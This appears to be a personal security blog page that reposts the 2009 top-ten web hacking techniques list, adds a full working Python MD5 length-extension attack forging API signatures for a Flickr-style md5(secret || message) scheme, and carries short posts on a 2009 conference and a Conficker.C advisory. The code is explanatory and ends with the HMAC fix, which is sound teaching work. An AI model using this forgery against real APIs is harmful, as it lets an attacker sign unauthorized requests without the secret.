Xanda's Blog !~!

Top Ten Web Hacking Techniques of 2009 (Official)

Top Ten Web Hacking Techniques of 2009!

1. Creating a rogue CA certificate
Alexander Sotirov, Marc Stevens, Jacob Appelbaum, Arjen Lenstra, David Molnar, Dag Arne Osvik, Benne de Weger

2. HTTP Parameter Pollution (HPP)
Luca Carettoni, Stefano diPaola

3. Flickr’s API Signature Forgery Vulnerability (MD5 extension attack)
Thai Duong and Juliano Rizzo

4. Cross-domain search timing
Chris Evans

5. Slowloris HTTP DoS
Robert Hansen (additional credit for earlier discovery to Adrian Ilarion Ciobanu and Ivan Ristic, whose “Programming Model Attacks” section of Apache Security described the attack but did not produce a tool)

6. Microsoft IIS 0-Day Vulnerability Parsing Files (semi-colon bug)
Soroush Dalili

7. Exploiting unexploitable XSS
Stephen Sclafani

8. Our Favorite XSS Filters and how to Attack them
Eduardo Vela (sirdarckcat), David Lindsay (thornmaker)

9. RFC1918 Caching Security Issues
Robert Hansen

10. DNS Rebinding (3-part series Persistent Cookies, Scraping & Spamming, and Session Fixation)
Robert Hansen

[source: Jeremiah Grossman]
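Item 3 on the list is the one that is easiest to reproduce at a keyboard, so here is an added worked example of the MD5 length-extension attack behind the Flickr API signature forgery. This is not code from Duong and Rizzo's paper or from Flickr; it only assumes the general shape of the weakness, a signature computed as md5(secret || message) where the attacker can observe message and the signature, and can guess the byte length of the secret. The secret, message and appended suffix below are constructed values, and the parameter string is a simplification of the real API's concatenation format. Because MD5 is a Merkle-Damgård construction, the digest is the internal state after the final block, so anyone who knows the digest can resume hashing from it and sign message || padding || suffix without ever learning the secret.

```python
import hashlib
import math
import struct

MASK32 = 0xFFFFFFFF
# Per-round left-rotation amounts and the sine-derived additive constants
# from RFC 1321.
SHIFTS = ([7, 12, 17, 22] * 4 + [5, 9, 14, 20] * 4
          + [4, 11, 16, 23] * 4 + [6, 10, 15, 21] * 4)
KCONST = [int(abs(math.sin(i + 1)) * 2 ** 32) & MASK32 for i in range(64)]
INITIAL_STATE = (0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476)


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK32


def md5_padding(total_len):
    """Padding MD5 appends to a message of total_len bytes: 0x80, zeros up
    to 56 mod 64, then the bit length as a 64-bit little-endian integer."""
    pad = b"\x80" + b"\x00" * ((55 - total_len) % 64)
    return pad + struct.pack("<Q", (total_len * 8) & 0xFFFFFFFFFFFFFFFF)


def _compress(state, block):
    """One MD5 compression of a 64-byte block onto the chaining state."""
    a0, b0, c0, d0 = state
    m = struct.unpack("<16I", block)
    a, b, c, d = a0, b0, c0, d0
    for i in range(64):
        if i < 16:
            f, g = (b & c) | (~b & d), i
        elif i < 32:
            f, g = (d & b) | (~d & c), (5 * i + 1) % 16
        elif i < 48:
            f, g = b ^ c ^ d, (3 * i + 5) % 16
        else:
            f, g = c ^ (b | ~d), (7 * i) % 16
        f = (f + a + KCONST[i] + m[g]) & MASK32
        a, d, c, b = d, c, b, (b + _rotl(f, SHIFTS[i])) & MASK32
    return ((a0 + a) & MASK32, (b0 + b) & MASK32,
            (c0 + c) & MASK32, (d0 + d) & MASK32)


def md5(data, state=INITIAL_STATE, prior_len=0):
    """MD5 of data, optionally resuming from a known chaining state that
    already covers prior_len bytes (prior_len must be a multiple of 64)."""
    assert prior_len % 64 == 0
    padded = data + md5_padding(prior_len + len(data))
    for off in range(0, len(padded), 64):
        state = _compress(state, padded[off:off + 64])
    return struct.pack("<4I", *state)


def forge_signature(known_sig, secret_len, message, suffix):
    """Length extension: from md5(secret || message) and the length of the
    secret alone, produce (message || glue || suffix) and a signature the
    server will accept, without knowing the secret."""
    state = struct.unpack("<4I", known_sig)      # digest == chaining state
    glue = md5_padding(secret_len + len(message))  # padding the server used
    resumed_len = secret_len + len(message) + len(glue)
    forged_sig = md5(suffix, state, resumed_len)
    return message + glue + suffix, forged_sig


def demo():
    # Constructed values: the secret is what the server keeps hidden, the
    # message is the signed parameter string the attacker can observe.
    secret = b"s3cretAPIk3y"                      # assumed 12-byte secret
    message = b"api_key123method=flickr.photos.search"
    sig = hashlib.md5(secret + message).digest()  # signature the server issued

    forged_msg, forged_sig = forge_signature(sig, len(secret), message,
                                             b"user_id=victim")
    # The server recomputes md5(secret || forged_msg) and compares.
    server_check = hashlib.md5(secret + forged_msg).digest()
    return forged_sig == server_check


if __name__ == "__main__":
    print("forged signature accepted:", demo())
```

Two practical caveats: the attacker needs the secret length (in practice it is brute-forced over a small range, re-checking each candidate against the server), and the glue bytes are non-printable, so the forgery only works where the server's parameter parsing passes them through unchanged into the string it hashes. The fix is to stop exposing the hash state, i.e. sign with HMAC-MD5 (or better, HMAC over a modern hash) rather than a bare hash over secret || message.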

HITBSecConf 2009

First of all, congrats to d3ck4, crayon and the team..

Hurm.. HITBSecConf 2009.. Personally, nothing much.. I was disappointed with Mark Dowd's and Saumil's presentations (yeah.. maybe I'm expecting too much) but somehow Wes Brown, METASM and Google's guy fixed my day..

Enjoyed spending some time outside of the office, meeting people (and old friends), and (_NOT_ really) learning new stuff..

Anyway.. That's what happened..

Malsing Maps for Mapking G10/2007, R12 and PC are released

Malsing Maps for Mapking G10/2007, R12 and PC are now updated [18 Jul 2009] and ready to be downloaded HERE

1st April 2009 – Happy Conficker.C Al-Mubarak

has been observing an increasing trend of IT security related discussion and information sharing about a worm variant called Conficker.C on the internet. It is expected that this enhanced version of the previous worm variants Conficker.A and Conficker.B will trigger on the coming 1st of April. Security researchers believe the latest outbreak of Conficker variant C began spreading at roughly 6 p.m. PST, 4 March 2009 (5 March UTC). would like to highlight that this is neither a new outbreak nor a new piece of malware. Removal and mitigation strategies were highlighted in our previous advisory.

[Read more]